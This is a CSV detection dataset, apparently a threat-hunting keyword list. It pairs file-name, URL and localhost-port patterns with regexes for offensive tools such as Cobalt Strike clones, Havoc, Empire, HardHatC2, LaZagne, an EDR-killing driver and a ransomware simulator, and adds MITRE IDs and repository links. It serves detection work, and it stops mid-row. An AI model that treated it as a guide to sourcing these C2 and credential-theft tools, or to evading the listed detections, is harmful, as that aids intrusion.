"*HtaVBSGenerator.*",".{0,1000}HtaVBSGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*htdigest2john.py*",".{0,1000}htdigest2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*htdocs/database/jasmin_db.sql*",".{0,1000}htdocs\/database\/jasmin_db\.sql.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*html/js/beacons.js*",".{0,1000}html\/js\/beacons\.js.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*html/scripts/merlin.js*",".{0,1000}html\/scripts\/merlin\.js.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Html-Injection-Payloads.*",".{0,1000}Html\-Injection\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*Html-Injection-Read-File-Payloads.*",".{0,1000}Html\-Injection\-Read\-File\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*HTMLSmuggler-main*",".{0,1000}HTMLSmuggler\-main.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","2","135","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z" "*HTool-Lazagne*",".{0,1000}HTool\-Lazagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*htrgouvea/nipe*",".{0,1000}htrgouvea\/nipe.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1833","307","2024-01-28T17:07:21Z","2015-09-07T18:47:10Z" "*htshells-master*",".{0,1000}htshells\-master.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*http* | hakrawler -d *",".{0,1000}http.{0,1000}\s\|\shakrawler\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*http*/127.0.0.1*:1337*",".{0,1000}http.{0,1000}\/127\.0\.0\.1.{0,1000}\:1337.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*http*/alertmsg.zip*",".{0,1000}http.{0,1000}\/alertmsg\.zip.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*http*/charlotte.dll*",".{0,1000}http.{0,1000}\/charlotte\.dll.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*http*/demon.dll",".{0,1000}http.{0,1000}\/demon\.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*http*/demon.exe",".{0,1000}http.{0,1000}\/demon\.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*http*/demos/butcher/index.html*",".{0,1000}http.{0,1000}\/demos\/butcher\/index\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*http*/john/Test/raw/master/*",".{0,1000}http.{0,1000}\/john\/Test\/raw\/master\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*http*/localhost*:1337*",".{0,1000}http.{0,1000}\/localhost.{0,1000}\:1337.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*http*/zha0gongz1*",".{0,1000}http.{0,1000}\/zha0gongz1.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*http*://*/Terminator.sys",".{0,1000}http.{0,1000}\:\/\/.{0,1000}\/Terminator\.sys","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*http*://127.0.0.1:4433*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:4433.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*http*://127.0.0.1:5556*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:5556.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*http*://localhost:4433*",".{0,1000}http.{0,1000}\:\/\/localhost\:4433.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*http*://localhost:5556*",".{0,1000}http.{0,1000}\:\/\/localhost\:5556.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*http*:3000/hook.js*",".{0,1000}http.{0,1000}\:3000\/hook\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*http*:3200/manjusaka*",".{0,1000}http.{0,1000}\:3200\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*http*:801/bq1iFEP2*",".{0,1000}http.{0,1000}\:801\/bq1iFEP2.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*http*127.0.0.1:21802*",".{0,1000}http.{0,1000}127\.0\.0\.1\:21802.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:3030*",".{0,1000}http.{0,1000}127\.0\.0\.1\:3030.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*http*127.0.0.1:5000*",".{0,1000}http.{0,1000}127\.0\.0\.1\:5000.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:50050*",".{0,1000}http.{0,1000}127\.0\.0\.1\:50050.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*http*127.0.0.1:5096*",".{0,1000}http.{0,1000}127\.0\.0\.1\:5096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:57230*",".{0,1000}http.{0,1000}127\.0\.0\.1\:57230.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*http*127.0.0.1:7096*",".{0,1000}http.{0,1000}127\.0\.0\.1\:7096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.dll*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.exe*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.ps1*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:9631*",".{0,1000}http.{0,1000}127\.0\.0\.1\:9631.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:21802*",".{0,1000}http.{0,1000}localhost\:21802.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:3030*",".{0,1000}http.{0,1000}localhost\:3030.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*http*localhost:5000*",".{0,1000}http.{0,1000}localhost\:5000.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:50050*",".{0,1000}http.{0,1000}localhost\:50050.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*http*localhost:5096*",".{0,1000}http.{0,1000}localhost\:5096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:57230*",".{0,1000}http.{0,1000}localhost\:57230.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*http*localhost:7096*",".{0,1000}http.{0,1000}localhost\:7096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:9631*",".{0,1000}http.{0,1000}localhost\:9631.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http.title:*BIG-IP®*- Redirect*",".{0,1000}http\.title\:.{0,1000}BIG\-IP\®.{0,1000}\-\sRedirect.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","55","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" "*HTTP/EXEGOL-01.*",".{0,1000}HTTP\/EXEGOL\-01\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*http://*.oast.fun/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.fun\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.live/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.live\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.me/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.me\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.online/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.online\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used 